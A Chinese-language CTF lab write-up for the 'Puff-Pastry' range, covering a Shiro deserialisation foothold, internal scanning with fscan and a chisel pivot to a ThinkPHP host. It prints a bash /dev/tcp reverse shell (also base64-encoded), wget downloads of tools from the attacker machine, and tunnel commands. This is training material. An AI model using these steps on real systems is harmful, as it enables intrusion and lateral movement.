Puff-Pastry
信息
靶场项目地址 CTF-Archives/Puff-Pastry
严格意义上来说,环境对外开放端口就是 8080
Shiro 攻击
看到请求包里面有 Remenberme
字段,很明显就是打 Shiro 反序列化
flag - Shiro
flag 文件位于 /flag.txt
Shiro 内网扫描
首先先反弹 shell
Shiro
# /bin/bash -i >& /dev/tcp/192.168.200.129/9999 0>&1
$ echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjAwLjEyOS85OTk5IDA+JjE= | base64 -d > /tmp/shell.sh
$ chmod +x /tmp/shell.sh
$ ls -lh /tmp/shell.sh
-rwxr-xr-x 1 root root 50 Jul 25 03:04 /tmp/shell.sh
$ /bin/bash /tmp/shell.sh
即可收到回连的 shell
┌──(randark ㉿ kali)-[~]
└─$ pwncat-cs -lp 9999
[11:02:56] Welcome to pwncat 🐈!
[11:05:45] received connection from 192.168.200.2:34432
[11:05:45] 192.168.200.2:34432: registered new host w/ db
(local) pwncat$ back
(remote) root@31b77ed217da:/# whoami
root
从攻击机上下载 fscan
二进制文件,查看网段信息
(remote) root@31b77ed217da:/tmp# wget 192.168.200.129/fscan
--2024-07-25 03:10:17-- http://192.168.200.129/fscan
Connecting to 192.168.200.129:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7100304 (6.8M) [application/octet-stream]
Saving to: ‘fscan’
fscan 100%[===================================================================================================================>] 6.77M --.-KB/s in 0.04s
2024-07-25 03:10:17 (152 MB/s) - ‘fscan’ saved [7100304/7100304]
(remote) root@31b77ed217da:/tmp# chmod +x fscan
(remote) root@31b77ed217da:/tmp# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.100.3 netmask 255.255.255.0 broadcast 192.168.100.255
ether 02:42:c0:a8:64:03 txqueuelen 0 (Ethernet)
RX packets 1023 bytes 15481580 (14.7 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 755 bytes 64521 (63.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
并执行网段扫描(结果已排除宿主机)
start infoscan
(icmp) Target 192.168.100.2 is alive
(icmp) Target 192.168.100.3 is alive
[*] Icmp alive hosts len is: 3
192.168.100.2:80 open
192.168.100.2:9000 open
192.168.100.3:8080 open
[*] alive ports len is: 6
start vulscan
[+] FCGI 192.168.100.2:9000
Status: 403 Forbidden
X-Powered-By: PHP/7.3.33
Content-type: text/html; charset=UTF-8
Access denied.
stderr:Access to the script '/etc/issue' has been denied (see security.limit_extensions)
plesa try other path,as -path /www/wwwroot/index.php
[*] WebTitle http://192.168.100.2 code:200 len:931 title:None
[*] WebTitle http://192.168.100.3:8080 code:302 len:0 title:None 跳转 url: http://192.168.100.3:8080/login;jsessionid=ECF003F339B02D6026C308A9C8B0E8C2
[*] WebTitle http://192.168.100.3:8080/login;jsessionid=ECF003F339B02D6026C308A9C8B0E8C2 code:200 len:2608 title:Login Page
[+] PocScan http://192.168.100.2 poc-yaml-thinkphp5023-method-rce poc1
[+] PocScan http://192.168.100.3:8080/ poc-yaml-shiro-key [{key kPH+bIxk5D2deZiIxcaaaA==} {mode cbc}]
Net 192.168.100.0/24
Thinkphp - 192.168.100.2
[+] PocScan http://192.168.100.2 poc-yaml-thinkphp5023-method-rce poc1
Shiro - 192.168.100.3
[+] PocScan http://192.168.100.3:8080/ poc-yaml-shiro-key [{key kPH+bIxk5D2deZiIxcaaaA==} {mode cbc}]
Shiro 端口转发
由于需要访问内网的 Thinkphp 服务,就需 要搭建代理隧道
Kali
┌──(randark ㉿ kali)-[~/tools/chisel-v1.9.1]
└─$ ./chisel_1.9.1_linux_amd64 server -p 1331 --reverse &
[1] 1846492
2024/07/25 11:18:01 server: Reverse tunnelling enabled
2024/07/25 11:18:01 server: Fingerprint CG5EKTNIsW4ByFzEmmK2qMxfuLVm6Cegnhee/wABfqk=
2024/07/25 11:18:01 server: Listening on http://0.0.0.0:1331
Shiro
(remote) root@31b77ed217da:/tmp# wget 192.168.200.129/chisel_1.9.1_linux_amd64
--2024-07-25 03:17:13-- http://192.168.200.129/chisel_1.9.1_linux_amd64
Connecting to 192.168.200.129:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8654848 (8.3M) [application/octet-stream]
Saving to: ‘chisel_1.9.1_linux_amd64’
chisel_1.9.1_linux_amd64 100%[===================================================================================================================>] 8.25M --.-KB/s in 0.1s
2024-07-25 03:17:13 (78.8 MB/s) - ‘chisel_1.9.1_linux_amd64’ saved [8654848/8654848]
(remote) root@31b77ed217da:/tmp# chmod +x chisel_1.9.1_linux_amd64
(remote) root@31b77ed217da:/tmp# ./chisel_1.9.1_linux_amd64 client 192.168.200.129:1331 R:0.0.0.0:10001:192.168.100.2:80 &
[1] 216
2024/07/25 03:20:24 client: Connecting to ws://192.168.200.129:1331
2024/07/25 03:20:24 client: Connected (Latency 1.096734ms)
在服务端上成功建立端口转发
2024/07/25 11:20:24 server: session#4: tun: proxy#R:10001=>192.168.100.2:80: Listening
Thinkphp 攻击
首先进行漏洞检测
发现以下漏洞信息
[+] 目标存在 tp5_construct_code_exec_2 漏洞
[+] 目标存在 tp5_construct_code_exec_1 漏洞
[+] 目标存在 tp5_session_include 漏洞
尝试进行利用
flag - Thinkphp
flag 文件位于 /flag.txt